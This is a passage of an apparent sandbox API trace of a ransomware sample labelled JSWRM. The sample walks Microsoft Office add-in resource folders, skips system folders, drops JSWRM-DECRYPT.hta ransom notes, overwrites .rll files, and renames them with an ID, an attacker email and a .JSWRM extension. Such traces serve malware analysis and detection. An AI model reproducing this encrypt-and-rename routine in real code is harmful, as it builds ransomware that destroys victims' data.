excel add-in\\resources\\1027\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1027\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1027\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.973] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4266542, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4266542, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0126.973] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0126.974] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd42fe2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1028", cAlternateFileName="")) returned 1 [0126.974] lstrcmpiW (lpString1="1028", lpString2=".") returned 1 [0126.974] lstrcmpiW (lpString1="1028", lpString2="..") returned 1 [0126.974] lstrcmpiW (lpString1="1028", lpString2="...") returned 1 [0126.974] lstrcmpiW (lpString1="1028", lpString2="windows") returned -1 [0126.974] lstrcmpiW (lpString1="1028", lpString2="recovery") returned -1 [0126.974] lstrcmpiW (lpString1="1028", lpString2="perflogs") returned -1 [0126.974] lstrcmpiW (lpString1="1028", lpString2="documents and settings") returned -1 [0126.974] lstrcmpiW (lpString1="1028", lpString2="$RECYCLE.BIN") returned 1 [0126.974] lstrcmpiW (lpString1="1028", lpString2="system volume information") returned -1 [0126.974] lstrcmpiW (lpString1="1028", lpString2="msocache") returned -1 [0126.974] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1028\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1028\\jswrm-decrypt.hta")) returned 0xffffffff [0126.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1028\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1028\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.976] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.976] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0126.977] CloseHandle (hObject=0x338) returned 1 [0126.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1028\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1028\\jswrm-decrypt.hta")) returned 0x20 [0126.977] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1028\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x425812d0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0126.977] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.977] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x425812d0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0126.978] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.978] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.978] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x425812d0, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x425812d0, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x425812d0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.978] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.978] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.978] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.978] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.978] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.978] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.978] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.978] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.978] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.978] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.978] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x106c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0126.978] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0126.978] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0126.978] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0126.978] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0126.978] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0126.978] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0126.978] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0126.978] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0126.978] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0126.978] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0126.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241100, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0126.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0126.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1028\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1028\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0126.979] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=67264) returned 1 [0126.979] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.980] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x106c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x106c0, lpOverlapped=0x0) returned 1 [0126.986] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.986] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x106c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x106c0, lpOverlapped=0x0) returned 1 [0126.987] CloseHandle (hObject=0x264) returned 1 [0126.987] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1028\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1028\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1028\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1028\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.988] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x106c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0126.988] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0126.989] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf632eb9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1029", cAlternateFileName="")) returned 1 [0126.989] lstrcmpiW (lpString1="1029", lpString2=".") returned 1 [0126.989] lstrcmpiW (lpString1="1029", lpString2="..") returned 1 [0126.989] lstrcmpiW (lpString1="1029", lpString2="...") returned 1 [0126.989] lstrcmpiW (lpString1="1029", lpString2="windows") returned -1 [0126.989] lstrcmpiW (lpString1="1029", lpString2="recovery") returned -1 [0126.989] lstrcmpiW (lpString1="1029", lpString2="perflogs") returned -1 [0126.989] lstrcmpiW (lpString1="1029", lpString2="documents and settings") returned -1 [0126.989] lstrcmpiW (lpString1="1029", lpString2="$RECYCLE.BIN") returned 1 [0126.989] lstrcmpiW (lpString1="1029", lpString2="system volume information") returned -1 [0126.989] lstrcmpiW (lpString1="1029", lpString2="msocache") returned -1 [0126.989] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1029\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1029\\jswrm-decrypt.hta")) returned 0xffffffff [0126.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1029\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1029\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.990] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.990] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0126.991] CloseHandle (hObject=0x338) returned 1 [0126.991] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1029\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1029\\jswrm-decrypt.hta")) returned 0x20 [0126.991] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1029\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x425a73cc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0126.991] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.991] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x425a73cc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0126.991] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.992] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.992] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x425a73cc, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x425a73cc, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x425a73cc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.992] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.992] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.992] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.992] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.992] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.992] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.992] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.992] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.992] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.992] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.992] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0126.992] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0126.992] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0126.992] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0126.992] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0126.992] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0126.992] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0126.992] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0126.992] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0126.992] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0126.992] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0126.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0126.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241358, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0126.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1029\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1029\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0126.994] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=70848) returned 1 [0126.994] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.994] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x114c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x114c0, lpOverlapped=0x0) returned 1 [0127.000] SetFilePointer (in: hFile=0x264, 